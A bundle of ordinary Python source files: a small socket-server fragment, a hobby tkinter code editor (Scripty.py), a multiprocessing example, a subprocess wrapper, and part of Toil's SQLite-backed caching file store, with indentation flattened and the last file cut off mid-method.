sock, addr = s.accept()
t = threading.Thread(target=tcplink, args=(sock, addr))
t.start()
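# Illustrative client for manually exercising the server above (run in a separate shell):
#
#   import socket
#   c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   c.connect(('127.0.0.1', 9999))
#   print(c.recv(1024))   # b'Welcome!'
#   c.send(b'world')
#   print(c.recv(1024))   # b'hello: world'
#   c.send(b'exit')       # tells the handler loop to stop
#   c.close()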
|
Scripty.py
|
#!/usr/bin/env python3
# An open-source IDE for python, java, and C++
# By Jaden Arceneaux arceneauxJaden@gmail.com
# Feel free to change code as you feel
import sys
import os
# For running commands in the terminal
try:
from tkinter import *
from tkinter import messagebox
from tkinter import filedialog
except:
os.system('sudo apt-get install python3-tk')
from tkinter import *
from tkinter import messagebox
from tkinter import filedialog
# Checks if tkinter is installed
# if not then installs it
# used for UI
import json
# For parsing json files
import time
import threading
# For running multiple tasks on the CPU
os.system('chmod +x Scripty.py')
appAlive = True
# This keeps track of whether the app is still open
# Used for killing threads
defaultConfigFile = open('Settings/DefaultConfig.json')
defaultConfigFile = defaultConfigFile.read()
defaultConfigFile = json.loads(defaultConfigFile)
# This opens and parses the default config file
configFile = open('Settings/Config.json')
configFile = configFile.read()
try:
configFile = json.loads(configFile)
except:
configFile = defaultConfigFile
# This attempts to open the user config file; if a JSON error is
# thrown, the default config is used instead
styleSheet = open("Settings/Themes/" + configFile["theme"].lower() + '.json')
styleSheet = json.loads(styleSheet.read())
os.system('clear')
# ^ clears the terminal at the start of the program
window = Tk()
window.geometry("550x350")
# ^ declared window and sets size (in pixels)
if sys.argv[-1] == "Scripty.py":
fileLine = filedialog.asksaveasfilename(initialdir = "~/Scripty/Projects",title = "Select file",filetypes = (("All Files","*.*"),("C++","*.cpp"), ("Java", "*.java"), ("Python", "*.py")))
else:
fileLine = 'Projects/' + str(sys.argv[-1])
window.title(str(fileLine))
# ^ finds the argument for which file to edit in the terminal
# and sets it as the title of the window
try:
try:
currFile = open(str(fileLine))
except:
newFile = open(str(fileLine), "w")
newFile.close()
currFile = open(str(fileLine))
except:
    # Strip the directory part and fall back to the bare file name
    fileLine = os.path.basename(fileLine)
try:
currFile = open(str(fileLine))
except:
newFile = open(str(fileLine), "w")
newFile.close()
currFile = open(str(fileLine))
# This tests to see if the file the user entered exists; otherwise it will create a new one
if configFile['line-wrap'] == True:
if configFile['line-wrap-type'] == 'CHAR':
editor = Text(window, wrap = CHAR)
elif configFile['line-wrap-type'] == 'WORD':
editor = Text(window, wrap = WORD)
else:
editor = Text(window, wrap = CHAR)
for line in currFile:
editor.insert(INSERT, line)
editor.place(rely = 0.07, relx = 0, relheight = 0.93, relwidth = 1.0)
else:
scrollbar = Scrollbar(window, orient=HORIZONTAL, background = styleSheet['bg-color'])
scrollbar.place(relx = 0, rely = 0.95, relheight = 0.05)
editor = Text(window, wrap = NONE)
editor.config(yscrollcommand=scrollbar.set)
scrollbar.config(command=editor.xview)
for line in currFile:
editor.insert(INSERT, line)
editor.place(rely = 0.07, relx = 0, relheight = 0.88, relwidth = 1.0)
# checks if line wrap is enabled and which kind of line wrap it is
# if line wrap is not enabled it enables the scrollbar
def save():
global appAlive
try:
user = editor.get('1.0', END)
file = open(str(fileLine), "w")
file.write(user)
file.close()
except:
appAlive = False
# Save function
# it takes all the text in the editor and writes it to the appropriate file
def saveShortCut(arg):
save()
# This function maps the save function to work with a keyboard shortcut
def openWindow():
global editor, fileLine
    openFile = str(filedialog.askopenfilename(initialdir = "~/Scripty/Projects",title = "Select file",filetypes = (("All Files","*.*"),("C++","*.cpp"), ("Java", "*.java"), ("Python", "*.py"))))
editor.delete('1.0', END)
openFileData = open(openFile)
openFileData = openFileData.read()
editor.insert(INSERT, openFileData)
fileLine = openFile
    # Show just the file name in the window title, but keep the full path in
    # fileLine so that save() still writes to the right place
    window.title(os.path.basename(str(fileLine)))
# This function allows the user to open a different file in the editor
def saveAs():
global fileLine, appAlive
fileLine = filedialog.asksaveasfilename(initialdir = "~/Scripty/Projects",title = "Select file",filetypes = (("All Files","*.*"),("C++","*.cpp"), ("Java", "*.java"), ("Python", "*.py")))
try:
user = editor.get('1.0', END)
file = open(str(fileLine), "w")
file.write(user)
file.close()
except:
appAlive = False
window.title(str(fileLine))
# Function for save as button
def executeCode():
save()
# saves file before running
if configFile['clear-on-run'] == True:
os.system('clear')
# checks if clear on run is enabled in settings
# if so clears terminal before running code
if '.py' in fileLine:
os.system('python3 ' + str(fileLine))
elif '.java' in fileLine:
os.system('javac ' + str(fileLine))
os.system('cd Projects && java ' + (fileLine[:-5]).replace('Projects/', ''))
elif '.cpp' in fileLine:
os.system('g++ ' + str(fileLine) + ' -o ' + fileLine[:-4])
os.system('cd / && .' + fileLine[:-4])
elif '.cs' in fileLine:
os.system('dotnet run ' + fileLine)
elif '.c' in fileLine:
os.system('gcc ' + str(fileLine) + ' -o ' + fileLine[:-2])
os.system('cd / && .' + fileLine[:-2])
elif '.js' in fileLine:
os.system('node ' + str(fileLine))
# finds which programming language the program is written in
# runs code using that language
def enableEditor():
editor.configure(state=NORMAL)
    # sets editor to its enabled state
def run():
if configFile['run-lock'] == False:
runThread = threading.Thread(target = executeCode, name = "runThread1")
runThread.start()
else:
editor.configure(state=DISABLED)
# disables editor while running if run lock is True
runThread = threading.Thread(target = executeCode, name = "runThread1")
runThread.start()
runThread.join()
enableThread = threading.Thread(target = enableEditor, name = "enableThread1")
enableThread.start()
enableThread.join()
        # once it is done running, re-enables the editor
# function for running code
def runShortCut(arg):
runThread = threading.Thread(target = executeCode, name = "runThread1")
runThread.start()
# keyboard short cut for running code
# accepts argument from keyboard
def clear():
os.system('clear')
# function for clearing terminal
def settings():
settingsWin = Tk()
settingsWin.geometry("350x600")
settingsWin.title("Settings")
    # declares settings window
def saveSettings():
with open('Settings/Config.json', 'w') as configFile:
newSettings = settingsEditor.get('1.0', END)
configFile.write(newSettings)
messagebox.showinfo("WAIT", "Please reload to apply changes")
# function for saving settings
saveSettingsBtn = Button(settingsWin, text = 'Save', command = lambda: saveSettings())
saveSettingsBtn.place(relx = 0, rely = 0, relwidth = 1.0, relheight = 0.1)
# declares saveSettingsButton
settingsEditor = Text(settingsWin)
settingsEditor.place(relx = 0, rely = 0.1, relwidth = 1.0, relheight = 0.9)
    # declares settings editor
def tab(arg):
settingsEditor.insert(INSERT, " " * configFile["default-indent-spacing"])
return 'break'
settingsEditor.bind("<Tab>", tab)
# binds tab to appropriate spacing
settingsEditor.insert(INSERT, open('Settings/Config.json').read())
saveSettingsBtn.configure(background=styleSheet["button-color"], foreground = styleSheet["font-color"], highlightthickness = 0, bd = 0)
settingsEditor.configure(background=styleSheet["bg-color"], foreground = styleSheet["font-color"], insertbackground=styleSheet["curser-color"], highlightthickness = 0, bd = 0)
# configures settings editor and buttons to match styling
settingsWin.mainloop()
def autoSave():
if configFile["auto-save"] == True:
while appAlive == True:
save()
time.sleep(configFile["auto-save-interval"])
# function for auto save
runBtn = Button(window, text = "Run", command = lambda: run())
runBtn.place(relx = 0, rely = 0, relwidth = 0.18, relheight = 0.07)
# declares run button
saveBtn = Button(window, text = "Save", command = lambda: save())
saveBtn.place(relx = 0.18, rely = 0, relwidth = 0.18, relheight = 0.07)
# declares save button
saveAsBtn = Button(window, text = "Save As", command = lambda: saveAs())
saveAsBtn.place(relx = 0.36, rely = 0, relwidth = 0.18, relheight = 0.07)
# declares save as button
openBtn = Button(window, text = "Open", command = lambda: openWindow())
openBtn.place(relx = 0.54, rely = 0, relwidth = 0.18, relheight = 0.07)
# declares open button
clearBtn = Button(window, text = "Clear", command = lambda: clear())
clearBtn.place(relx = 0.72, rely = 0, relwidth = 0.18, relheight = 0.07)
# declares clear button
settingsBtn = Button(window, text = configFile["settings-icon"], command = lambda: settings())
settingsBtn.place(relx = 0.9, rely = 0, relwidth = 0.1, relheight = 0.07)
# declares settings button
def tab(arg):
if '.py' in str(fileLine):
editor.insert(INSERT, " " * configFile["python-indent-spacing"])
elif '.java' in str(fileLine):
editor.insert(INSERT, " " * configFile["java-indent-spacing"])
elif '.cpp' in str(fileLine):
editor.insert(INSERT, " " * configFile["cpp-indent-spacing"])
elif '.js' in str(fileLine):
editor.insert(INSERT, " " * configFile["js-indent-spacing"])
else:
editor.insert(INSERT, " " * configFile["default-indent-spacing"])
return 'break'
# maps tab to appropriate spacing
def paraComplete(arg):
editor.insert(INSERT, "()")
return 'break'
# inserts ()
def curlComplete(arg):
editor.insert(INSERT, "{}")
return 'break'
# inserts {}
def bracketComplete(arg):
editor.insert(INSERT, "[]")
return 'break'
# inserts []
def arrowComplete(arg):
editor.insert(INSERT, "<>")
return 'break'
# inserts <>
def dubQuoteComplete(arg):
editor.insert(INSERT, '""')
return 'break'
# inserts ""
def singQuoteComplete(arg):
editor.insert(INSERT, "''")
return 'break'
# inserts ''
def autoIndent(arg):
if str(' ' * configFile["python-indent-spacing"]) in editor.get(INSERT):
editor.insert(INSERT, " ")
# will automatically indent to the appropriate spacing
# work in progress
editor.bind("<Tab>", tab)
editor.bind(configFile["run-shortcut"], runShortCut)
editor.bind(configFile["save-shortcut"], saveShortCut)
if configFile["auto-indent"] == True:
editor.bind("<0xff0d>", autoIndent)
if configFile["auto-complete"] == True:
editor.bind("<0x0028>", paraComplete)
editor.bind("<0x08af>", curlComplete)
editor.bind("<0x005b>", bracketComplete)
editor.bind("<Shift-0x002c>", arrowComplete)
editor.bind("<Shift-0x0ad0>", dubQuoteComplete)
editor.bind("<0x0ad0>", singQuoteComplete)
# checks if auto complete is enabled
# if so binds keys
editor.configure(background=styleSheet["bg-color"], foreground = styleSheet["font-color"])
editor.configure(insertbackground=styleSheet["curser-color"])
editor.configure(font = (styleSheet["font"], configFile["font-size"]), highlightthickness = 0, bd = 0)
settingsBtn.configure(background=styleSheet["button-color"], foreground = styleSheet["font-color"], highlightthickness = 0, bd = 0)
clearBtn.configure(background=styleSheet["button-color"], foreground = styleSheet["font-color"], highlightthickness = 0, bd = 0)
saveAsBtn.configure(background=styleSheet["button-color"], foreground = styleSheet["font-color"], highlightthickness = 0, bd = 0)
runBtn.configure(background=styleSheet["button-color"], foreground = styleSheet["font-color"], highlightthickness = 0, bd = 0)
saveBtn.configure(background=styleSheet["button-color"], foreground = styleSheet["font-color"], highlightthickness = 0, bd = 0)
openBtn.configure(background=styleSheet["button-color"], foreground = styleSheet["font-color"], highlightthickness = 0, bd = 0)
# configures buttons and text editor to match style
autoSaveThread = threading.Thread(target = autoSave, name = "autosave1")
autoSaveThread.start()
# starts autosave thread
window.mainloop()
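# For reference, a minimal Settings/Config.json sketch covering the keys this
# script reads; the key names come from the code above, but the values shown
# here are illustrative assumptions, not the project's shipped defaults:
#
# {
#     "theme": "Dark",
#     "line-wrap": true,
#     "line-wrap-type": "WORD",
#     "clear-on-run": true,
#     "run-lock": false,
#     "auto-save": false,
#     "auto-save-interval": 30,
#     "auto-indent": false,
#     "auto-complete": false,
#     "font-size": 12,
#     "settings-icon": "*",
#     "run-shortcut": "<Control-r>",
#     "save-shortcut": "<Control-s>",
#     "default-indent-spacing": 4,
#     "python-indent-spacing": 4,
#     "java-indent-spacing": 4,
#     "cpp-indent-spacing": 4,
#     "js-indent-spacing": 2
# }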
|
mp_process03-2.py
|
from multiprocessing import Process, Manager
def func(d, l):
d[1] = '1'
d['2'] = 2
d[0.25] = None
l.reverse()
if __name__ == '__main__':
with Manager() as manager:
d = manager.dict()
l = manager.list(range(10))
p = Process(target=func, args=(d, l))
p.start()
p.join()
print(d)
print(l)
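        # Expected output (dict key order may vary with the Python version):
        #   {1: '1', '2': 2, 0.25: None}
        #   [9, 8, 7, 6, 5, 4, 3, 2, 1, 0]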
|
shell.py
|
import logging
import subprocess
import threading
import typing
logger = logging.getLogger(__name__)
class BaseError(Exception):
pass
class SubprocessFailed(BaseError):
pass
def execute(args, *, env=None, verbose: int, command_alias: str) -> None:
buffer: typing.List[str] = []
lock_process_completion = threading.Lock()
process_completed = False
def _capture_output():
for line in process.stdout:
try:
decoded = line.decode('utf-8')
except UnicodeDecodeError:
logger.error(
                    'Failed to decode subprocess output', exc_info=True,
)
continue
decoded = decoded.rstrip('\r\n')
with lock_process_completion:
if process_completed:
# Treat postmortem output from pipe as error.
# For example pg_ctl does not close pipe on exit so we may
# get output later from a started process.
logger.warning('[%s] %s', command_alias, decoded)
else:
if verbose > 1:
logger.info('[%s] %s', command_alias, decoded)
else:
buffer.append(decoded)
process = subprocess.Popen(
args, env=env, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
)
thread = threading.Thread(target=_capture_output)
thread.daemon = True
thread.start()
exit_code = process.wait()
with lock_process_completion:
process_completed = True
if exit_code != 0:
for msg in buffer:
logger.error('[%s] %s', command_alias, msg)
logger.error(
'[%s] subprocess %s exited with code %d',
command_alias,
process.args,
exit_code,
)
if exit_code != 0:
raise SubprocessFailed(
f'{command_alias} subprocess {process.args!r} '
f'exited with code {exit_code}',
)
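# A minimal usage sketch (hypothetical command and alias): stream the output
# of a subprocess at high verbosity and raise SubprocessFailed on a non-zero
# exit code.
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO)
    execute(['echo', 'hello'], verbose=2, command_alias='echo')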
|
cachingFileStore.py
|
# Copyright (C) 2015-2018 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, print_function
from future import standard_library
standard_library.install_aliases()
from builtins import map
from builtins import str
from contextlib import contextmanager
import errno
import hashlib
import logging
import os
import re
import shutil
import sqlite3
import sys
import tempfile
import threading
import time
import uuid
from toil.common import cacheDirName, getDirSizeRecursively, getFileSystemSize
from toil.lib.bioio import makePublicDir
from toil.lib.humanize import bytes2human
from toil.lib.misc import mkdir_p, robust_rmtree, atomic_copy, atomic_copyobj
from toil.lib.retry import retry
from toil.lib.threading import get_process_name, process_name_exists
from toil.fileStores.abstractFileStore import AbstractFileStore
from toil.fileStores import FileID
logger = logging.getLogger(__name__)
if sys.version_info[0] < 3:
# Define a usable FileNotFoundError as will be raised by os.remove on a
# nonexistent file.
FileNotFoundError = OSError
# Use longer timeout to avoid hitting 'database is locked' errors.
SQLITE_TIMEOUT_SECS = 60.0
class CacheError(Exception):
"""
    Base class for errors raised by the caching file store.
"""
def __init__(self, message):
super(CacheError, self).__init__(message)
class CacheUnbalancedError(CacheError):
"""
Raised if file store can't free enough space for caching
"""
    message = 'Unable to free enough space for caching. This error frequently arises due ' \
'to jobs using more disk than they have requested. Turn on debug logging to see ' \
'more information leading up to this error through cache usage logs.'
def __init__(self):
super(CacheUnbalancedError, self).__init__(self.message)
class IllegalDeletionCacheError(CacheError):
"""
    Error raised if the caching code discovers that a file which represents a
    reference to a cached file has gone missing.
This can be a big problem if a hard link is moved, because then the cache
will be unable to evict the file it links to.
Remember that files read with readGlobalFile may not be deleted by the user
and need to be deleted with deleteLocalFile.
"""
def __init__(self, deletedFile):
message = 'Cache tracked file (%s) has been deleted or moved by user ' \
                  'without updating cache database. Use deleteLocalFile to ' \
'delete such files.' % deletedFile
super(IllegalDeletionCacheError, self).__init__(message)
class InvalidSourceCacheError(CacheError):
"""
Error raised if the user attempts to add a non-local file to cache
"""
def __init__(self, message):
super(InvalidSourceCacheError, self).__init__(message)
class CachingFileStore(AbstractFileStore):
"""
A cache-enabled file store.
Provides files that are read out as symlinks or hard links into a cache
directory for the node, if permitted by the workflow.
Also attempts to write files back to the backing JobStore asynchronously,
after quickly taking them into the cache. Writes are only required to
finish when the job's actual state after running is committed back to the
job store.
    Internally, manages caching using a database. Each node has its own
database, shared between all the workers on the node. The database contains
several tables:
files contains one entry for each file in the cache. Each entry knows the
path to its data on disk. It also knows its global file ID, its state, and
its owning worker PID. If the owning worker dies, another worker will pick
it up. It also knows its size.
File states are:
- "cached": happily stored in the cache. Reads can happen immediately.
Owner is null. May be adopted and moved to state "deleting" by anyone, if
it has no outstanding immutable references.
- "downloading": in the process of being saved to the cache by a non-null
owner. Reads must wait for the state to become "cached". If the worker
dies, goes to state "deleting", because we don't know if it was fully
downloaded or if anyone still needs it. No references can be created to a
"downloading" file except by the worker responsible for downloading it.
- "uploadable": stored in the cache and ready to be written to the job
store by a non-null owner. Transitions to "uploading" when a (thread of)
the owning worker process picks it up and begins uploading it, to free
cache space or to commit a completed job. If the worker dies, goes to
state "cached", because it may have outstanding immutable references from
the dead-but-not-cleaned-up job that was going to write it.
- "uploading": stored in the cache and being written to the job store by a
non-null owner. Transitions to "cached" when successfully uploaded. If
the worker dies, goes to state "cached", because it may have outstanding
immutable references from the dead-but-not-cleaned-up job that was
writing it.
- "deleting": in the process of being removed from the cache by a non-null
owner. Will eventually be removed from the database.
refs contains one entry for each outstanding reference to a cached file
(hard link, symlink, or full copy). The table name is refs instead of
references because references is an SQL reserved word. It remembers what
job ID has the reference, and the path the reference is at. References have
three states:
- "immutable": represents a hardlink or symlink to a file in the cache.
Dedicates the file's size in bytes of the job's disk requirement to the
cache, to be used to cache this file or to keep around other files
without references. May be upgraded to "copying" if the link can't
actually be created.
- "copying": records that a file in the cache is in the process of being
copied to a path. Will be upgraded to a mutable reference eventually.
- "mutable": records that a file from the cache was copied to a certain
path. Exist only to support deleteLocalFile's API. Only files with only
mutable references (or no references) are eligible for eviction.
jobs contains one entry for each job currently running. It keeps track of
the job's ID, the worker that is supposed to be running the job, the job's
disk requirement, and the job's local temp dir path that will need to be
cleaned up. When workers check for jobs whose workers have died, they null
out the old worker, and grab ownership of and clean up jobs and their
references until the null-worker jobs are gone.
properties contains key, value pairs for tracking total space available,
and whether caching is free for this run.
"""
def __init__(self, jobStore, jobGraph, localTempDir, waitForPreviousCommit):
super(CachingFileStore, self).__init__(jobStore, jobGraph, localTempDir, waitForPreviousCommit)
# For testing, we have the ability to force caching to be non-free, by never linking from the file store
self.forceNonFreeCaching = False
# Also for testing, we have the ability to force a delay (in seconds)
# during file download from the job store, in order to easily test the
# behavior of the system when a download is in progress.
self.forceDownloadDelay = None
# When waiting for other running workers to download a file, or
# otherwise progress, how long in seconds should we wait between
# polling attempts? Our mechanism for polling involves an exclusive
# lock on the database and conditional writes, so this should be high
# enough that everyone isn't constantly contending for the lock.
self.contentionBackoff = 15
# Variables related to caching
# Decide where the cache directory will be. We put it next to the
# local temp dirs for all of the jobs run on this machine.
# At this point in worker startup, when we are setting up caching,
# localTempDir is the worker directory, not the job directory.
self.localCacheDir = os.path.join(os.path.dirname(localTempDir),
cacheDirName(self.jobStore.config.workflowID))
        # Since each worker has its own unique CachingFileStore instance, and only one Job can run
# at a time on a worker, we can track some stuff about the running job in ourselves.
self.jobName = str(self.jobGraph)
self.jobID = self.jobGraph.jobStoreID
logger.debug('Starting job (%s) with ID (%s).', self.jobName, self.jobID)
# When the job actually starts, we will fill this in with the job's disk requirement.
self.jobDiskBytes = None
# We need to track what attempt of the workflow we are, to prevent crosstalk between attempts' caches.
self.workflowAttemptNumber = self.jobStore.config.workflowAttemptNumber
# Make sure the cache directory exists
mkdir_p(self.localCacheDir)
# Connect to the cache database in there, or create it if not present.
# We name it by workflow attempt number in case a previous attempt of
# the workflow left one behind without cleaning up properly; we need to
# be able to tell that from showing up on a machine where a cache has
# already been created.
self.dbPath = os.path.join(self.localCacheDir, 'cache-{}.db'.format(self.workflowAttemptNumber))
# We need to hold onto both a connection (to commit) and a cursor (to actually use the database)
self.con = sqlite3.connect(self.dbPath, timeout=SQLITE_TIMEOUT_SECS)
self.cur = self.con.cursor()
# Note that sqlite3 automatically starts a transaction when we go to
# modify the database.
# To finish this transaction and let other people read our writes (or
# write themselves), we need to COMMIT after every coherent set of
# writes.
# Set up the tables
self._ensureTables(self.con)
# Initialize the space accounting properties
freeSpace, _ = getFileSystemSize(self.localCacheDir)
self._write([('INSERT OR IGNORE INTO properties VALUES (?, ?)', ('maxSpace', freeSpace))])
# Space used by caching and by jobs is accounted with queries
# We maintain an asynchronous upload thread, which gets kicked off when
# we commit the job's completion. It will be None until then. When it
# is running, it has exclusive control over our database connection,
# because the job we exist for will have already completed. However, it
# has to coordinate its activities with other CachingFileStore objects
# in the same process (and thus sharing the same PID) and ensure that
# only one of them is working on uploading any given file at any given
# time.
self.commitThread = None
@staticmethod
def _staticWrite(con, cur, operations):
"""
Write to the caching database, using the given connection.
If we can't get an SQLite write lock on the database, retry with some
backoff until we can.
operations is a list of tuples of (sql string, optional tuple of values
to substitute), or bare sql strings.
All operations are executed in a single transaction, which is
committed.
:param sqlite3.Connection con: Connection to the cache database.
:param sqlite3.Cursor cur: Cursor in the cache database.
:param list operations: List of sql strings or tuples of (sql, optional values) to execute.
:return: Number of rows modified by the last operation
:rtype: int
"""
for attempt in retry(timeout=float('inf'), predicate=lambda e: isinstance(e, sqlite3.OperationalError) and 'is locked' in str(e)):
# Try forever with backoff
with attempt:
try:
for item in operations:
if not isinstance(item, tuple):
# Must be a single SQL string. Wrap it.
item = (item,)
# Parse out the command and the variables to substitute
command = item[0]
if len(item) < 2:
args = ()
else:
args = item[1]
# Do it
cur.execute(command, args)
except Exception as e:
                    logger.error('Error talking to caching database: %s', str(e))
# Try to make sure we don't somehow leave anything part-done if a
# middle operation somehow fails.
try:
con.rollback()
except:
# But don't stop if we can't roll back.
pass
# Raise and maybe retry
raise e
else:
# The transaction worked!
# Now commit the transaction.
con.commit()
return cur.rowcount
def _write(self, operations):
"""
Write to the caching database, using the instance's connection
If we can't get an SQLite write lock on the database, retry with some
backoff until we can.
operations is a list of tuples of (sql string, optional tuple of values
to substitute), or bare sql strings.
All operations are executed in a single transaction, which is
committed.
:param list operations: List of sql strings or tuples of (sql, optional values) to execute.
:return: Number of rows modified by the last operation
:rtype: int
"""
return self._staticWrite(self.con, self.cur, operations)
@classmethod
def _ensureTables(cls, con):
"""
Ensure that the database tables we expect exist.
:param sqlite3.Connection con: Connection to the cache database.
"""
# Get a cursor
cur = con.cursor()
cls._staticWrite(con, cur, ["""
CREATE TABLE IF NOT EXISTS files (
id TEXT NOT NULL PRIMARY KEY,
path TEXT UNIQUE NOT NULL,
size INT NOT NULL,
state TEXT NOT NULL,
owner TEXT
)
""", """
CREATE TABLE IF NOT EXISTS refs (
path TEXT NOT NULL,
file_id TEXT NOT NULL,
job_id TEXT NOT NULL,
state TEXT NOT NULL,
PRIMARY KEY (path, file_id)
)
""", """
CREATE TABLE IF NOT EXISTS jobs (
id TEXT NOT NULL PRIMARY KEY,
tempdir TEXT NOT NULL,
disk INT NOT NULL,
worker TEXT
)
""", """
CREATE TABLE IF NOT EXISTS properties (
name TEXT NOT NULL PRIMARY KEY,
value INT NOT NULL
)
"""])
# Caching-specific API
def getCacheLimit(self):
"""
Return the total number of bytes to which the cache is limited.
If no limit is available, raises an error.
"""
for row in self.cur.execute('SELECT value FROM properties WHERE name = ?', ('maxSpace',)):
return row[0]
raise RuntimeError('Unable to retrieve cache limit')
def getCacheUsed(self):
"""
Return the total number of bytes used in the cache.
If no value is available, raises an error.
"""
# Space never counts as used if caching is free
if self.cachingIsFree():
return 0
for row in self.cur.execute('SELECT TOTAL(size) FROM files'):
return row[0]
raise RuntimeError('Unable to retrieve cache usage')
def getCacheExtraJobSpace(self):
"""
Return the total number of bytes of disk space requested by jobs
running against this cache but not yet used.
We can get into a situation where the jobs on the node take up all its
space, but then they want to write to or read from the cache. So when
that happens, we need to debit space from them somehow...
If no value is available, raises an error.
"""
# Total up the sizes of all the reads of files and subtract it from the total disk reservation of all jobs
for row in self.cur.execute("""
SELECT (
(SELECT TOTAL(disk) FROM jobs) -
(SELECT TOTAL(files.size) FROM refs INNER JOIN files ON refs.file_id = files.id WHERE refs.state == 'immutable')
) as result
"""):
return row[0]
raise RuntimeError('Unable to retrieve extra job space')
def getCacheAvailable(self):
"""
Return the total number of free bytes available for caching, or, if
negative, the total number of bytes of cached files that need to be
evicted to free up enough space for all the currently scheduled jobs.
If no value is available, raises an error.
"""
# Get the max space on our disk.
# Subtract out the number of bytes of cached content.
# Also subtract out the number of bytes of job disk requirements that
# aren't being spent by those jobs on immutable references to cached
# content.
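        # Worked example with made-up numbers: if maxSpace is 100 GB, cached
        # files total 30 GB, and jobs have requested 50 GB of which 10 GB is
        # already spent on immutable references to cached files, then
        # available = 100 - 30 - (50 - 10) = 30 GB.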
# Do a little report first
for row in self.cur.execute("SELECT value FROM properties WHERE name = 'maxSpace'"):
logger.debug('Max space: %d', row[0])
for row in self.cur.execute("SELECT TOTAL(size) FROM files"):
logger.debug('Total file size: %d', row[0])
for row in self.cur.execute("SELECT TOTAL(disk) FROM jobs"):
logger.debug('Total job disk requirement size: %d', row[0])
for row in self.cur.execute("SELECT TOTAL(files.size) FROM refs INNER JOIN files ON refs.file_id = files.id WHERE refs.state = 'immutable'"):
logger.debug('Total immutable reference size: %d', row[0])
if self.cachingIsFree():
# If caching is free, we just say that all the space is always available.
for row in self.cur.execute("SELECT value FROM properties WHERE name = 'maxSpace'"):
return row[0]
raise RuntimeError('Unable to retrieve available cache space')
for row in self.cur.execute("""
SELECT (
(SELECT value FROM properties WHERE name = 'maxSpace') -
(SELECT TOTAL(size) FROM files) -
((SELECT TOTAL(disk) FROM jobs) -
(SELECT TOTAL(files.size) FROM refs INNER JOIN files ON refs.file_id = files.id WHERE refs.state = 'immutable'))
) as result
"""):
return row[0]
raise RuntimeError('Unable to retrieve available cache space')
def getSpaceUsableForJobs(self):
"""
Return the total number of bytes that are not taken up by job requirements, ignoring files and file usage.
We can't ever run more jobs than we actually have room for, even with caching.
If not retrievable, raises an error.
"""
for row in self.cur.execute("""
SELECT (
(SELECT value FROM properties WHERE name = 'maxSpace') -
(SELECT TOTAL(disk) FROM jobs)
) as result
"""):
return row[0]
        raise RuntimeError('Unable to retrieve usable space for jobs')
def getCacheUnusedJobRequirement(self):
"""
Return the total number of bytes of disk space requested by the current
job and not used by files the job is using in the cache.
Mutable references don't count, but immutable/uploading ones do.
If no value is available, raises an error.
"""
logger.debug('Get unused space for job %s', self.jobID)
for row in self.cur.execute('SELECT * FROM files'):
logger.debug('File record: %s', str(row))
for row in self.cur.execute('SELECT * FROM refs'):
logger.debug('Ref record: %s', str(row))
for row in self.cur.execute('SELECT TOTAL(files.size) FROM refs INNER JOIN files ON refs.file_id = files.id WHERE refs.job_id = ? AND refs.state != ?',
(self.jobID, 'mutable')):
# Sum up all the sizes of our referenced files, then subtract that from how much we came in with
return self.jobDiskBytes - row[0]
raise RuntimeError('Unable to retrieve unused job requirement space')
def adjustCacheLimit(self, newTotalBytes):
"""
Adjust the total cache size limit to the given number of bytes.
"""
self._write([('UPDATE properties SET value = ? WHERE name = ?', (newTotalBytes, 'maxSpace'))])
def fileIsCached(self, fileID):
"""
Return true if the given file is currently cached, and false otherwise.
Note that this can't really be relied upon because a file may go cached
-> deleting after you look at it. If you need to do something with the
file you need to do it in a transaction.
"""
for row in self.cur.execute('SELECT COUNT(*) FROM files WHERE id = ? AND (state = ? OR state = ? OR state = ?)',
(fileID, 'cached', 'uploadable', 'uploading')):
return row[0] > 0
return False
def getFileReaderCount(self, fileID):
"""
Return the number of current outstanding reads of the given file.
Counts mutable references too.
"""
for row in self.cur.execute('SELECT COUNT(*) FROM refs WHERE file_id = ?', (fileID,)):
return row[0]
return 0
def cachingIsFree(self):
"""
Return true if files can be cached for free, without taking up space.
Return false otherwise.
This will be true when working with certain job stores in certain
configurations, most notably the FileJobStore.
"""
for row in self.cur.execute('SELECT value FROM properties WHERE name = ?', ('freeCaching',)):
return row[0] == 1
# Otherwise we need to set it
from toil.jobStores.fileJobStore import FileJobStore
if isinstance(self.jobStore, FileJobStore) and not self.forceNonFreeCaching:
# Caching may be free since we are using a file job store.
# Create an empty file.
emptyID = self.jobStore.getEmptyFileStoreID()
# Read it out to a generated name.
destDir = tempfile.mkdtemp(dir=self.localCacheDir)
cachedFile = os.path.join(destDir, 'sniffLinkCount')
self.jobStore.readFile(emptyID, cachedFile, symlink=False)
# Check the link count
if os.stat(cachedFile).st_nlink == 2:
# Caching must be free
free = 1
else:
# If we only have one link, caching costs disk.
free = 0
# Clean up
os.unlink(cachedFile)
os.rmdir(destDir)
self.jobStore.deleteFile(emptyID)
else:
# Caching is only ever free with the file job store
free = 0
# Save to the database if we're the first to work this out
self._write([('INSERT OR IGNORE INTO properties VALUES (?, ?)', ('freeCaching', free))])
# Return true if we said caching was free
return free == 1
# Internal caching logic
def _getNewCachingPath(self, fileStoreID):
"""
Get a path at which the given file ID can be cached.
Will be unique for every call.
The file will not be created if it does not exist.
"""
# Hash the file ID
hasher = hashlib.sha1()
hasher.update(fileStoreID.encode('utf-8'))
# Get a unique temp file name, including the file ID's hash to make
# sure we can never collide even though we are going to remove the
# file.
# TODO: use a de-slashed version of the ID instead?
handle, path = tempfile.mkstemp(dir=self.localCacheDir, suffix=hasher.hexdigest())
os.close(handle)
os.unlink(path)
return path
def _stealWorkFromTheDead(self):
"""
Take ownership of any files we can see whose owners have died.
We don't actually process them here. We take action based on the states of files we own later.
"""
me = get_process_name(self.workDir)
# Get a list of all file owner processes on this node.
# Exclude NULL because it comes out as 0 and we can't look for PID 0.
owners = []
for row in self.cur.execute('SELECT DISTINCT owner FROM files WHERE owner IS NOT NULL'):
owners.append(row[0])
# Work out which of them have died.
deadOwners = []
for owner in owners:
if not process_name_exists(self.workDir, owner):
deadOwners.append(owner)
for owner in deadOwners:
# Try and adopt all the files that any dead owner had
# If they were deleting, we delete.
